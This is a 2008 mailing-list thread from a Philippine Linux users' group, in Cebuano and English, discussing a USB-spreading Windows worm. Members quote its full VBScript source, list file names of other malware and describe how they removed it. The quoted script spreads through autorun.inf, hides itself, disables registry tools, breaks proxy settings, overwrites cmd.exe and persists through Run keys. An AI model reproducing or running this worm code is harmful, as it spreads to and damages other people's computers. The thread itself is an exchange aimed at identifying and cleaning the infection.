Re: [klug] [OT] Malicious code from CDOC guy

Tue, 12 Feb 2008 16:58:35 -0800 

wow.. Script kiddies...
I'm also pushing Linux dinhi pud sa balay (gashare raman gud mi ug PC's)
But that would also mean bye2 gaming.. :(

On 2/13/08, Nino Rey <[EMAIL PROTECTED]> wrote:
>
> Guys unsa na antivirus sa market ang makadetect na aning isetup ug
> transmit.exe (black pegasus) na variant? Samok man gud danhi sa office
> namo halos tanan na maapektuhan... Ang worst pa jud is pag adto ka sa M$
> word, then click any of the menus, iya iclose ang tanan apps including
> explorer.exe den mu balik sa sinugdanan...
> Im still trying to push linux into the environment... gakahadlok pa ang
> mga tao danhi sa OS, pero Im on the process of influencing them hehehe....
>
>
> On 02 13, 08, at 1:01 AM, hard wyrd wrote:
>
> The "scandal variant" of this script also generates [PEGASUS].TXT on some
> systems which contains "BLACK PEGASUS" Hacking Team from Agusan del Sur. And
> also mentions that he/she/they come from STI in Agusan.
>
> That just confirms how prevalent this script is and is being exchanged in
> the underground too frequently.
>
> On Feb 12, 2008 10:47 PM, Camilo III Lozano <[EMAIL PROTECTED]> wrote:
>
> > sa ako nabaw-an.. taga Quezon, Manila gahimo sa TTMS...
> >
> > which is arch is right.. ang original kay...
> >
> >  rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet
> > Explorer\Main\Window Title", "I AM NOT A CORRUPT LIKE YOU"
> >
> > hmmm... naa pod Funny UST scandal thingy ani... daghan man... mao mani
> > uso karon... scripts na pangsinamok lang sa computer, pakamang sa computer
> > na di ma detect sa anti-virus... mostly kay VB....
> >
> > list ani nila sa akong na encounter sa XU internet lab kay...
> >
> > autorun.*
> > TTM*.*
> > Desktop.*
> > imgkulot*.*
> > RECYCLER\INFO.exe
> > RECYCLER\RECYCLER.exe
> > RECYCLER\Desktop.ini
> > sysdll.exe
> > krag.exe
> >   RavMon*.*
> > msv*.dll
> > scvhosts.exe
> > scvhost.exe
> > svhost.exe
> > C:\Windows\svhost.exe
> > C:\Windows\svhost32.exe
> > "New Folder".exe
> > "Funny UST Scandal.avi.exe"
> > smss.exe
> > jay.exe
> > transmit.exe
> >   isetup.exe
> >
> >
> > most sila ga kalat kay sa flashdisk... naka hidden files, system files
> > and read-only files....
> >
> > then time to time.. ga usab ila name.. then ga improve ila pag kamang...
> > last worst encounter nako kay even imo na gi safe mode, nag dagan gihapon
> > sya... balig naka system na sya... even imo na gi delete sa regedit kay naa
> > gihapon sya... msconfig, naa gihapon. ang last nako gibuhat kay gi delete
> > nako ang mga RECYCLER sa tanan drive nako.. kay didto man sila diay gatago..
> > hehehehehe... so solve na dayun.. :)
> >
> > amen...
> >
> > ===================================
> >
> > On 2/12/08, Ron Michael Khu <[EMAIL PROTECTED]> wrote:
> >
> > > Obviously this is offtopic, since the guy's script can only
> > > run in an OS which supports regedit.exe, wscript.exe and the
> > > other MS-apps.
> > >
> > > Choi gihapon ni iyang gibuhat... mo traverse sa tanan flashdrives
> > > and then copy itself to them :D
> > >
> > > pretty harmless compared to the other naught scripts but nonetheless
> > > still annoying :D
> > >
> > >
> > > "DOHHGS Ni TAGA CDOC"
> > >
> > > Who wants to claim ownership for this script?
> > > :D
> > >
> > > any takers?
> > >
> > >
> > > ---------------------------------------------------------------------------------------
> > > 'THIS IS A MODIFIED VERSION BY: TTMS
> > > 'PROUD TO BE FILIPINO, NOT TO CORRUPTION!
> > >
> > > On Error Resume Next
> > >
> > > Dim mydate, myvbsalias, myvbsfile, mysource, winpath, winsyspath,
> > > flashdrive, fs, mycmdfile, cmd, atr, tf, rg, nt, check, sd
> > >
> > > mycmdfile = "cmd.exe"
> > >
> > > mydate = month(now()) & day(now())
> > > myvbsalias = "TTMS" & mydate
> > > myvbsfile = myvbsalias & ".dll.vbs"
> > >
> > > atr = "[autorun]" & vbCrLf & _
> > >       "shellexecute=wscript.exe " & myvbsfile
> > >
> > > Set fs = CreateObject("Scripting.FileSystemObject")
> > >
> > > Dim mf, text, size
> > >
> > > Set mf = fs.GetFile(WScript.ScriptFullname)
> > >
> > > size = mf.size
> > > check = mf.Drive.drivetype
> > >
> > > Set text = mf.openastextstream(1, -2)
> > >
> > > Do While Not text.atendofstream
> > >    mysource = mysource & text.readline
> > >    mysource = mysource & vbCrLf
> > > Loop
> > >
> > > Do
> > >    Set winpath = fs.GetSpecialFolder(0)
> > >
> > >    Set tf = fs.GetFile(winpath & "\" & myvbsfile)
> > >
> > >    tf.Attributes = 32
> > >
> > >    Set tf = fs.CreateTextFile(winpath & "\" & myvbsfile, 2, True)
> > >
> > >    tf.Write mysource
> > >    tf.Close
> > >
> > >    Set tf = fs.GetFile(winpath & "\" & myvbsfile)
> > >
> > >    tf.Attributes = 39
> > >
> > >    If (mydate = "318") Then
> > >       Set winsyspath = fs.GetSpecialFolder(1)
> > >
> > >       cmd = "@echo off" & vbCrLf & _
> > >             "wscript " & winpath & "\" & myvbsfile
> > >
> > >       Set tf = fs.GetFile(winsyspath & "\" & mycmdfile)
> > >
> > >       tf.Attributes = 32
> > >
> > >       Set tf = fs.CreateTextFile(winsyspath & "\" & mycmdfile, 2)
> > >
> > >       tf.Write cmd
> > >       tf.Close
> > >
> > >       rg.RegWrite
> > > "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet
> > > Settings\ProxyEnable", 1, "REG_DWORD"
> > >       rg.RegWrite
> > > "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet
> > > Settings\ProxyServer", "0.0.0.0:80"
> > >
> > >       rg.RegWrite
> > > "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet
> > > Explorer\Control
> > > Panel\Connection Settings\Connwiz Admin Lock", 1, "REG_DWORD"
> > >   End If
> > >
> > >   For Each flashdrive In fs.drives
> > >       If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And
> > > flashdrive.Path <> "A:" Then
> > >          Set tf = fs.GetFile(flashdrive.Path & "\" & myvbsfile)
> > >
> > >          tf.Attributes = 32
> > >
> > >          Set tf = fs.CreateTextFile(flashdrive.Path & "\" & myvbsfile,
> > > 2, True)
> > >
> > >          tf.Write mysource
> > >          tf.Close
> > >
> > >          Set tf = fs.GetFile(flashdrive.Path & "\" & myvbsfile)
> > >
> > >          tf.Attributes = 39
> > >
> > >          Set tf = fs.GetFile(flashdrive.Path & "\autorun.inf")
> > >
> > >          tf.Attributes = 32
> > >
> > >          Set tf = fs.CreateTextFile(flashdrive.Path & "\autorun.inf",
> > > 2,
> > > True)
> > >
> > >          tf.Write atr
> > >          tf.Close
> > >
> > >          Set tf = fs.GetFile(flashdrive.Path & "\autorun.inf")
> > >
> > >          tf.Attributes = 39
> > >       End If
> > >    Next
> > >
> > >    Set rg = CreateObject("WScript.Shell")
> > >
> > >    rg.RegWrite
> > >
> > > "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",
> > > 1, "REG_DWORD"
> > >
> > >    rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet
> > > Explorer\Main\Window Title", "DOHHGS Ni TAGA CDOC WARNING GUBA NA IMO
> > > PC"
> > >
> > >    rg.RegWrite
> > >
> > > "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\MSConfig",
> > > winpath & "\" & myvbsfile
> > >    rg.RegWrite
> > >
> > > "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSConfig",
> > > winpath & "\" & myvbsfile
> > >
> > >
> > >    If check <> 1 Then
> > >       WScript.sleep 200000
> > >    End If
> > >
> > > Loop While (check <> 1)
> > >
> > > Set sd = CreateObject("WScript.Shell")
> > >
> > > sd.run winpath & "\explorer.exe /e,/select, " & WScript.ScriptFullname
> > >
> > > _________________________________________________
> > > Kagay-Anon Linux Users' Group (KLUG) Mailing List
> > > [email protected] (http://cdo.linux.org.ph)
> > > Searchable Archives: http://archives.free.net.ph
> > >
> >
> >
> >
> > --
> > --------------------
> > http://www.metacatalyst.com
> > http://www.metacatalyst.org
> > http://www.zabyer.org
> >
> > Got my Own Hacker Key:
> > v3sw3BHhw5ln2pr5OFPck3ma2u4MLw5XVm+5l5UCi5Ne4t3b5en5g5RaIs5MSr3p2
> > http://www.hackerkey.com
> >
> > Registered Linux User: #439468
> > _________________________________________________
> > Kagay-Anon Linux Users' Group (KLUG) Mailing List
> > [email protected] (http://cdo.linux.org.ph)
> > Searchable Archives: http://archives.free.net.ph
> >
>
>
>
> --
> "A dog that has no bite, barks loudest."
> Registered Linux User #400165
> http://baudizm.blogsome.com
> http://www.bayanihanbooks.com
> Full-Disclosure,LARTC,Open-ITLUG, PRUG, KLUG, linuxusersgroup,
> sybase.public.ase.linux_________________________________________________
> Kagay-Anon Linux Users' Group (KLUG) Mailing List
> [email protected] (http://cdo.linux.org.ph)
> Searchable Archives: http://archives.free.net.ph
>
>
>
> _________________________________________________
> Kagay-Anon Linux Users' Group (KLUG) Mailing List
> [email protected] (http://cdo.linux.org.ph)
> Searchable Archives: http://archives.free.net.ph
>



-- 
Proud owner and administrator of
www.nurseako.com

Cagayan de Oro Video Gaming Community
www.cdogamers.com

_________________________________________________
Kagay-Anon Linux Users' Group (KLUG) Mailing List
[email protected] (http://cdo.linux.org.ph)
Searchable Archives: http://archives.free.net.ph

Reply via email to